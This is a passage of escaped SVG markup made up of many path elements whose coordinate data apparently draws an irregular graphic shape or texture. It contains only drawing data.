d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path 